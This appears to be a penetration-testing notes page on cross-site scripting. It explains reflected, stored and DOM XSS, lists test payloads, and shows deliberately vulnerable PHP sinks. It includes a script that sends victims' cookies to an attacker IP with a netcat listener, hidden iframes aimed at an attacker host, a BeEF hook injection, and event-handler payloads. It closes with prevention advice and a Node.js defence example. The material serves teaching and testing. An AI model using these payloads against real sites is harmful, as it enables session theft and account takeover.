[XSS] Cross Site Scripting


Last updated 5 years ago


XSS vulnerabilities are caused by unsanitized user input that is then rendered into a web page as HTML. They allow an attacker to inject client-side scripts, such as JavaScript, into pages viewed by other users.

Although XSS does not directly compromise the server, it can still have significant impact: cookie theft and authentication bypass, redirecting the victim's browser to a malicious page, and more.

**Only JavaScript (or VBScript in old Internet Explorer) running in a page served from auth.y.com can read cookies belonging to auth.y.com.** That is why the payload has to be injected into the target site itself rather than hosted elsewhere. Note that a cookie flagged HttpOnly is not visible to document.cookie at all; the injected script can still act as the logged-in user from inside the page, but it cannot read that cookie out.

reflected = non-persistent: the payload travels in the HTTP request and is echoed back immediately in the response
stored = persistent: the payload is saved by the web application (comment, profile field, ...) and served to every user who views it
DOM XSS = lives entirely in the DOM environment: the page's own client-side script writes attacker-controlled data (e.g. from location.hash) into the page, and the payload never reaches server-side code

Camouflage URL

  • tinyurl

  • iframes

  • link in a targeted email

<plaintext> tag/payload for testing: if the rest of the page renders as raw text, your input landed unencoded in the HTML body

alert('abc');alert(document.cookie)

String.fromCharCode(xxx, xxx, xxx)
(JavaScript is case-sensitive: it is String, not string. Useful for building a string such as 'XSS' out of character codes when quotes are filtered.)

Payload example

<script>
x = '<!--<script>' < /script>/ - alert(1)
</script>

Vulnerable PHP sink (reflected XSS: the value is only echoed into the HTML, it is not executed as PHP, so this is not PHP code injection)

<?php
// $_GET['name'] is written straight into the HTML body without encoding
echo '<h4>Hello ' . $_GET['name'] . '</h4>';
?>

Browser Redirection and IFRAME Injection

<iframe SRC="http://$ip/report" height="0" width="0"></iframe>
An invisible (0x0) iframe makes the victim's browser fetch a page from the attacker host with nothing visible changing on screen:
<iframe src="http://<me>:<myport>/something" height="0" width="0"></iframe>

Stealing Cookies and Session Information

<iframe src="http://10.11.0.5/report" height="0" width="0"></iframe>
<script>new Image().src="http://10.11.0.126/bogus.php?output="+encodeURIComponent(document.cookie);</script>
(The scheme must be written as http:// ; with http: and no slashes the browser resolves the URL relative to the vulnerable site and the request never reaches you. encodeURIComponent keeps the ; and = inside the cookie string intact in the query.)

Catch the request on the attacker machine (binding port 80 needs root):
nc -nlvp 80

Attribute-context sink: here the input lands inside a quoted attribute, so no < is needed. A " closes the attribute and an event handler does the rest (see the event-handler payloads below).
<img src="logo.png" alt="<?= $_GET['name'] ?>">

Exploitation with Beef

Inject the BeEF hook into the vulnerable page through the XSS, e.g. <script src="http://<attacker>:3000/hook.js"></script> (3000 is BeEF's default port). Every victim who loads the page becomes a hooked browser in the BeEF UI.

With event handlers

When the input lands inside an attribute, break out of the quotes and add a handler:
abc" onmouseover=alert("XSS") "
onclick, onload, onerror etc.

<a onmouseover="alert('xss')">xss link</a>
<IMG SRC=# onmouseover="alert('xss')">
<IMG SRC=/ onerror="alert('xss')">
The onerror variant needs no user interaction: / is not a valid image, so the handler fires as soon as the page loads.

How to prevent XSS

  • Encoding: output-encode for the context the data lands in, e.g. < becomes &lt; (and " becomes &quot; inside attribute values)

  • Filtering: strip dangerous tokens, e.g. <script> becomes script. Easy to get wrong: a single non-recursive pass turns <scr<script>ipt> back into <script>

  • Validating: compare input against a white list of allowed characters or formats and reject everything else

  • Sanitization: combination of escaping, filtering and validation
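To make the four defences concrete, here is an added example in Node.js (not code from the original page) that implements each one and runs the payloads used earlier on this page through them, including a hardened version of the two PHP sinks above. The function names, the name allow-list pattern and the nested <scr<script>ipt> payload are this example's own.

```javascript
// Added example, not from the original page: the four defences above in
// Node.js, exercised with the payloads used earlier on this page.
// Function names and the name allow-list pattern are this example's own.

// Encoding: HTML-encode the six characters that matter in text and in
// quoted attribute values. Quotes are included so the same function is
// safe inside alt="..." style attributes, not only in the body.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function encodeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, (c) => HTML_ESCAPES[c]);
}

// Encoding for a JavaScript string literal sink (var name = "...";).
// JSON.stringify escapes quotes and backslashes; "</" is additionally broken
// up so the HTML parser cannot find a </script> inside the literal.
function encodeJsString(s) {
  return JSON.stringify(String(s)).replace(/<\//g, '<\\/');
}

// Filtering: the naive "strip <script> tags" approach from the list above,
// kept only to show why a single non-recursive pass is not enough.
function naiveStripScript(s) {
  return String(s).replace(/<\/?script>/gi, '');
}

// Validating: allow-list the shape of the input instead of hunting for bad
// bytes. A display name here may contain letters, digits, space, . ' and -.
function isValidName(s) {
  return /^[A-Za-z0-9 .'\-]{1,64}$/.test(String(s));
}

// Sanitization: validate first, then encode for the exact output context.
// Hardened version of: echo '<h4>Hello ' . $_GET['name'] . '</h4>';
function renderGreeting(name) {
  if (!isValidName(name)) return '<h4>Hello guest</h4>';
  return `<h4>Hello ${encodeHtml(name)}</h4>`;
}

// Hardened version of: <img src="logo.png" alt="<?= $_GET['name'] ?>">
// Encoding is enough here because the value always sits inside quotes.
function renderAltAttribute(name) {
  return `<img src="logo.png" alt="${encodeHtml(name)}">`;
}

// Hardened version of a script-block sink: <script>var name = "...";</script>
function renderScriptVar(name) {
  return `<script>var name = ${encodeJsString(name)};</script>`;
}

// Constructed payloads: the ones used earlier on this page, plus the nested
// <scr<script>ipt> trick that defeats the naive filter and a </script>
// breakout aimed at the script-block sink.
const PAYLOADS = {
  scriptTag: "<script>alert('abc');alert(document.cookie)</script>",
  attributeBreakout: 'abc" onmouseover=alert("XSS") "',
  imgOnerror: '<IMG SRC=/ onerror="alert(\'xss\')">',
  nestedScript: '<scr<script>ipt>alert(1)</scr</script>ipt>',
  closeScript: '</script><script>alert(1)</script>',
};

// Run every payload through every defence and return the rendered strings,
// so the results can be inspected or asserted on rather than only printed.
function runAll() {
  const out = {};
  for (const [name, p] of Object.entries(PAYLOADS)) {
    out[name] = {
      encoded: encodeHtml(p),
      filtered: naiveStripScript(p),
      valid: isValidName(p),
      greeting: renderGreeting(p),
      alt: renderAltAttribute(p),
      script: renderScriptVar(p),
    };
  }
  return out;
}
```

Call runAll() and look at the filtered field for nestedScript: the naive filter hands back a clean <script>alert(1)</script>, while the encoded field never contains a raw < for any payload. The allow-list rejects the attribute breakout outright, but still lets a legitimate O'Brien through, and encoding then takes care of the apostrophe.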

https://portswigger.net/web-security/cross-site-scripting
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS
https://www.youtube.com/watch?v=3pXeSkM7m3M&list=PLZOToVAK85MoYN8LF4vsGNtgwmLinMnW3
https://www.youtube.com/watch?v=3pXeSkM7m3M&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=60
https://www.youtube.com/watch?v=I0SusAlT1wY&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=63
https://www.youtube.com/watch?v=gU_zv8HIG2g&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=177
https://www.youtube.com/watch?v=t-44ZsaeIQE&list=PLZOToVAK85MqxEPGXA80NPMZEczZfA9ej&index=199